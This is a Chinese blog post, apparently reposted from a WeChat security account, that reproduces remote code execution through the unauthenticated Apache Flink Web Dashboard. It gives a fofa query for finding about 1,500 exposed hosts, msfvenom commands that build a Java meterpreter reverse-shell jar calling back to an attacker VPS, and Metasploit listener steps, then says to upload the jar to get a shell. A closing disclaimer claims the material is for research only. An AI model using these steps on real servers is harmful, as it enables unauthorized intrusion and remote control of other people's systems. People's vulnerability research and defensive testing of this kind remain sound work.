前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【漏洞复现】Apache Flink Web Dashboard 未授权访问导致RCE

【漏洞复现】Apache Flink Web Dashboard 未授权访问导致RCE

作者头像
用户1467662
发布2019-11-19 13:16:51
4.8K0
发布2019-11-19 13:16:51
举报
文章被收录于专栏:农夫安全农夫安全

一、漏洞危害

Apache Flink Web Dashboard 未授权访问,上传恶意jar导致远程代码命令执行漏洞复现

高危,能远程执行任意命令

二、影响程度

利用fofa搜索本程序,关键词:app="Apache-Flink" ,接近1500台,初步尝试发现命中率较高。

三、漏洞复现

访问出现此页面功能模块,证明可能存在漏洞

3.1 MSF监听

第一步:生成需要上传的jar包

msf监听:

>msfvenom -p java/meterpreter/reverse_tcp LHOST=VPS LPORT=VPS_PORT -f jar > rce.jar

第二步:监听端口

>use exploits/multi/handler

>set PAYLOAD java/meterpreter/reverse_tcp

>set LHOST your_ip

>exploit -j

第三步:上传文件,点击submit

上传之后点击submit

获取shell

执行命令

四、免责声明

本文中提到的漏洞利用Poc和脚本仅供研究学习使用,请遵守《网络安全法》等相关法律法规。

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-11-15,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 网络安全社区悦信安 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 二、影响程度
  • 三、漏洞复现
    • 3.1 MSF监听
    • 四、免责声明
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档